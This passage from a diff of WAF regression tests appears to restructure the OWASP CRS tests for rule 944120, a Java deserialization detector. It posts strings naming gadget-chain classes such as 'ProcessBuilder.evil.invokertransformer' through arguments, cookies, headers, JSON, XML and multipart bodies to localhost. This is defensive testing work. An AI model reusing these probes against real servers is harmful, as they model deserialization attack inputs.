"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log_contains: "id \"944120\"" + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 73 desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 74 desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 75 desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 76 desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 77 desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 78 desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 79 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_id: 80 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_id: 81 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 82 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 